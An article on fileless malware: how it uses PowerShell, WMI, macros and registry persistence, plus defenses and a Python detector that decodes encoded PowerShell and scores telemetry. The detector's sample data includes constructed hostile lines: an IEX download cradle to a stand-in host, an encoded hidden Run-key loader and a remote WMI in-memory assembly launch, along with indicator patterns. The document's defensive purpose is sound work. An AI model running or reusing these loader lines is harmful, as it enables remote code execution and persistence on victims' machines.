How to Recognize and Successfully Resist Fileless Malware Threats
By Artsiom Balabanau on
Cyber attacks pose a serious threat to any digital business. Using stolen credentials and compromised devices, attackers gain access to valuable information, and they keep finding ways to abuse virtually every new technology. Cybersecurity Ventures predicts that the global cost of cybercrime will reach $10.5 trillion a year by 2025.
The use of fileless malware is growing rapidly: according to Trend Micro, detections of fileless attacks rose by 265% in the first half of 2019 compared with the same period of 2018. What is fileless malware, and how can it be countered? This article addresses both questions.
What is fileless malware?
Fileless (sometimes called bodiless) malware is a way of infecting a device without writing a malicious executable to disk: the payload runs entirely in RAM. Fileless attacks enter through common channels such as PowerShell, Microsoft Office macros and Windows Management Instrumentation (WMI), and then live inside the memory of legitimate processes. Although the payload itself leaves no file behind, the persistence mechanism often does leave a trace, for example an encoded script stored in the Windows registry or the WMI repository, and that is where defenders should look. To make the difference clearer, consider how a computer is infected with conventional malware. A user downloads an infected file to their laptop, and the malware embeds itself in program files (batch files, executables, device drivers and so on). The presence of such unwanted "guests" shows: files and drives get damaged, programs stop functioning, the computer slows down. Worse, the malware can steal passwords, credit card numbers and other confidential information saved in the browser. Because conventional malware lives in files, file-scanning antivirus can find it; fileless malware removes exactly that artifact.

How does fileless malware work?
Fileless malware abuses legitimate, trusted programs that are already present in the operating system. For example, in December 2019 fileless malware for macOS was discovered disguised as part of a cryptocurrency trading application, UnionCryptoTrader.dmg. A trojanized version of the legitimate installer was distributed from a cryptocurrency arbitrage website, and its second-stage payload was executed in memory rather than saved to disk. A fileless attack usually starts with a user's action. The victim receives a well-disguised phishing message, clicks the link and is redirected to a malicious website. The site then triggers a browser plugin such as Adobe Flash (a common attack vector until Flash reached end of life at the end of 2020). The exploit launches PowerShell and passes it commands that execute in the computer's memory. One of those commands connects to the command-and-control (C&C) server and downloads a further PowerShell script that locates sensitive data and exfiltrates it. Nothing in this chain has to be written to disk. Fileless malware can reach a device's memory in the following ways:
- via emails, links or malicious downloads that look legitimate;
- via installed trusted applications (for example a Microsoft Word macro, or a JavaScript file run by the Windows Script Host);
- via built-in system tools (Windows Management Instrumentation (WMI) or Microsoft PowerShell);
- via attacker-controlled websites, where a vulnerable browser plugin such as Flash allows malicious code to run in the browser's memory.
Types of fileless malware attacks
Cyber security experts distinguish three main categories of fileless attacks:
1. Windows registry manipulation. This type of attack starts with a malicious file or link. When the file is opened or the link followed, a normal Windows process writes an encoded script into the registry and executes it from there, often from an autorun key, so the code survives a reboot without ever existing as a file.
2. Memory code injection. This method hides malicious code inside the memory of legitimate processes. While the operating system is running, the malware spreads by re-injecting itself into other processes. Because the "wreckers" are trusted Windows programs (for example PowerShell and WMI), signature-based antivirus sees nothing wrong.
3. Script-based methods. Script-based attacks may be only partially fileless, but they are still difficult to find. The SamSam ransomware and Operation Cobalt Kitty worked this way.
Fileless malware keeps damaging the system for as long as it remains hidden.
How you can protect your company from fileless attacks
What makes fileless attacks so insidious is also what makes them elusive. As mentioned above, traditional antivirus that scans files on disk cannot detect them, because the malicious code exists only in memory. That also helps the criminals cover their tracks: once the system reboots, the in-memory payload is gone (unless the attacker planted a registry or WMI persistence entry to relaunch it), and little evidence remains for investigators. What can be done? Speaking about personal security, fileless attacks often rely on users' lack of awareness. To keep malware off your device, be careful when downloading or installing applications, clicking links and opening emails, and update your operating system and programs regularly, since this closes the common vulnerabilities that exploits rely on. Within a business, enlisting a vendor that provides cyber security services is ideal. Traditional, file-centric methods alone will not protect you, but there are approaches that work:
- network detection and response, which spots the C&C and exfiltration traffic a fileless payload still has to generate;
- data streaming technology, that is, continuous analysis of endpoint and network telemetry instead of periodic file scans;
- disabling macros in Office documents received from outside the organization;
- tracking unauthorized traffic leaving the network;
- logging what the trusted tools themselves are asked to do, for example enabling PowerShell script block logging and monitoring WMI and registry autorun changes, so that "living off the land" becomes visible.
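The measures above work only if someone actually inspects what trusted tools such as PowerShell and WMI are being asked to run. The following Python is an added example written for this edit, not code from the original author: it recovers the script hidden behind PowerShell's -EncodedCommand switch (which PowerShell defines as Base64 of the UTF-16LE encoded script) and scores each record against indicators typical of in-memory loaders, such as a download cradle piped into Invoke-Expression or a hidden-window launch. The telemetry records, host names and registry value name are constructed for the example, and the indicator weights and threshold are illustrative choices to be tuned against a real environment's baseline.

```python
"""Triage PowerShell command lines and script blocks for fileless-malware
indicators.  Added example: the records below are constructed, not taken from a
real incident, and the indicator list is a starting point to tune against your
own baseline, not a complete signature set."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Download cradle that a registry-resident loader might hide behind
# -EncodedCommand (constructed; example.invalid never resolves).
CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
# PowerShell expects -EncodedCommand as Base64 of the UTF-16LE encoded script.
ENCODED = base64.b64encode(CRADLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed telemetry: a Run-key value, a benign process creation (Event 4688),
# a logged script block (Event 4104) and a remote WMI process launch.
SAMPLES = [
    {"source": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "text": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
             r" -nop -w hidden -enc " + ENCODED},
    {"source": "Event 4688 on WS-0042",
     "text": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"source": "Event 4104 on WS-0042",
     "text": "$wc = New-Object Net.WebClient; IEX $wc.DownloadString('http://example.invalid/b')"},
    {"source": "Event 4688 on FILESRV01",
     "text": 'wmic /node:FILESRV01 process call create "powershell -nop -w hidden'
             ' -ep bypass -c [Reflection.Assembly]::Load($b)"'},
]

# -EncodedCommand may be shortened to any unambiguous prefix (-e, -ec, -enc ...).
ENC_RE = re.compile(r"(?<!\S)-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})", re.IGNORECASE)

# (name, pattern, weight); weights reflect how rarely admins type these by hand.
INDICATORS = [(name, re.compile(pat, re.IGNORECASE), w) for name, pat, w in [
    ("Invoke-Expression of dynamic content", r"\biex\b|invoke-expression", 3),
    ("download cradle", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", 3),
    ("in-memory assembly load", r"\[(?:system\.)?reflection\.assembly\]::load", 3),
    ("WMI process creation", r"win32_process|invoke-wmimethod|invoke-cimmethod|\bwmic\b", 2),
    ("execution policy bypass", r"-e(?:p|xecutionpolicy)\s+bypass", 2),
    ("inline base64 decoding", r"frombase64string", 2),
    ("hidden window", r"-w[a-z]*\s+hidden", 1),
    ("profile skipped", r"-nop\b|-noprofile\b", 1),
    ("non-interactive", r"-noni\b|-noninteractive\b", 1),
]]
THRESHOLD = 4  # chosen so that a lone -NoProfile does not page anyone


@dataclass
class Finding:
    source: str
    score: int
    indicators: List[str]
    decoded: Optional[str]

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def decode_encoded_command(text: str) -> Optional[str]:
    """Recover the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(source: str, text: str) -> Finding:
    """Score one command line, Run-key value or script block."""
    decoded = decode_encoded_command(text)
    indicators, score, haystack = [], 0, text
    if decoded is not None:
        # Score the decoded script, not the Base64 blob, which matches nothing.
        haystack = ENC_RE.sub(" -enc <decoded below>", text) + "\n" + decoded
        indicators.append("encoded command")
        score += 2
    for name, pattern, weight in INDICATORS:
        if pattern.search(haystack):
            indicators.append(name)
            score += weight
    return Finding(source, score, indicators, decoded)


def run_samples() -> List[Finding]:
    return [analyze(rec["source"], rec["text"]) for rec in SAMPLES]


if __name__ == "__main__":
    for f in run_samples():
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{flag:10} score={f.score:2} {f.source}: {', '.join(f.indicators)}")
        if f.decoded:
            print(f"{'':10} decoded: {f.decoded}")
```

Run as-is, the Run-key value is flagged at score 10 (encoded command, Invoke-Expression, download cradle, hidden window, profile skipped), the benign backup task scores 1 and is left alone, the logged script block scores 6 and the remote WMI launch 9. Feeding real Event 4104 and 4688 records in is a matter of mapping their fields onto `source` and `text`; keep the benign baseline in the same loop so that threshold changes are measured against it.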
Conclusion
Malicious software can live on a company's network for a long time before being discovered, and the longer the intrusion goes unnoticed, the greater the damage. RiskIQ estimates that losses from phishing attacks amount to $17,700 per minute. Traditional anti-malware methods are no longer as effective as they once were at keeping attackers out. What is needed is a combination of tools and strategies that minimizes the number of loopholes available to an attacker. A cyber security assessment is one way to get a comprehensive audit of password policies, antivirus, firewalls and data backups, and a solution tailored to the organization will help protect its information and avoid severe financial losses.